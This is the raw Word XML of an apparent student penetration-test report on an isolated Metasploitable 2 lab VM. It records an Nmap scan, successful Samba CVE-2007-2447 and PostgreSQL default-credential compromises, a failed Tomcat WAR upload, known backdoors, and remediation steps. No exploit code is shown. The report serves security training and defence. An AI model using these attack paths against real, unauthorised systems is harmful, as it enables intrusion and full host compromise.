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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING ASSESSMENT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Delta Steel — Metasploitable Laboratory Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba Exploitation, PostgreSQL Access &amp; Apache Tomcat Evaluation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Prepared by:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7026"/>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Adewale J Bhadmus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Module / Programme:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7026"/>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Cybersecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Assessment Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7026"/>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12 October 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Target System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7026"/>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10.0.2.9 (Metasploitable 2 — Isolated Lab VM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Testing Environment:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7026"/>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Kali Linux / Metasploit Framework — Isolated Lab Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7026"/>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C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CONFIDENTIAL — For Academic / Internal Use Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Document Version:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7026"/>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1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="2000"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="BFBFBF" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠  CONFIDENTIAL: This document contains sensitive security information. Distribution is restricted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:footerReference w:type="default" r:id="rId7"/>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>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140" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">To refresh this Table of Contents in Microsoft Word, press Ctrl+A to select all, then press F9.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report presents the findings and outcomes of an authorised penetration test conducted against a single-host target (IP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.2.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) operating as a Metasploitable 2 laboratory virtual machine. The assessment was conducted by Adewale J Bhadmus within an isolated, controlled lab environment, using Kali Linux and the Metasploit Framework as primary tooling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The scope was limited to a single-host internal network assessment (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.2.9/32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). All testing was conducted with explicit authorisation in a designated lab environment. No production systems were at risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1: Executive Finding Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5527"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate Action Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5527"/>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Yes — Immediate remediation required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5527"/>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Yes — Address within 7 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5527"/>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Planned — Address within 30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="375623"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5527"/>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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5527"/>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000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4 Critical, 5 High require immediate attention</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Nmap 7.95 service enumeration scan identified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">23 open TCP ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target host, revealing a highly exposed attack surface. Two of three exploitation attempts were successful:</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CRITICAL — Samba usermap_script (CVE-2007-2447): Remote Command Shell obtained without authentication</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CRITICAL — PostgreSQL Default Credentials: Meterpreter session established via exposed database service</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FAILED — Apache Tomcat Manager WAR Upload: Exploit unsuccessful due to inaccessible management interface</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CRITICAL — Metasploitable Root Bind Shell on TCP/1524: Pre-installed backdoor detected</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CRITICAL — vsftpd 2.3.4 Backdoor (CVE-2011-2523): Known backdoor present on FTP service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Overall Security Posture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The target system presents a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">critically weak security posture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The combination of unpatched legacy services, default credentials, exposed administrative interfaces, and pre-installed backdoors renders the host highly susceptible to full system compromise. The successful exploitation of Samba and PostgreSQL confirms real, exploitable vulnerabilities with direct paths to remote code execution and privileged access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Priority Recommendations</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Immediately disable the Metasploitable root bind shell (TCP/1524) and all intentional backdoors</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Patch or replace vsftpd 2.3.4, Samba 3.0.20, and UnrealIRCd 3.2.8.1</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Change all default credentials, particularly for PostgreSQL, MySQL, and Tomcat Manager</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Disable all insecure remote access services: Telnet (23), rlogin (513), rsh (514), rexec (512)</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Implement firewall rules to restrict unnecessary service exposure on the network perimeter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  Project Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1  Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This penetration testing engagement was designed to evaluate the security posture of the designated target system within a controlled lab environment. The specific objectives of this assessment were:</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Conduct authorised reconnaissance and service enumeration against target host 10.0.2.9 using Nmap 7.95</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Identify all exposed network services and map them to known vulnerability databases (NVD, CVE)</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Perform controlled exploitation using the Metasploit Framework to validate the exploitability and severity of identified vulnerabilities</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Document all findings with appropriate evidence, risk classifications, and CVSS scores where applicable</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Provide a prioritised remediation roadmap aligned with recognised security frameworks</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Demonstrate the practical importance of patch management, service hardening, and network segmentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
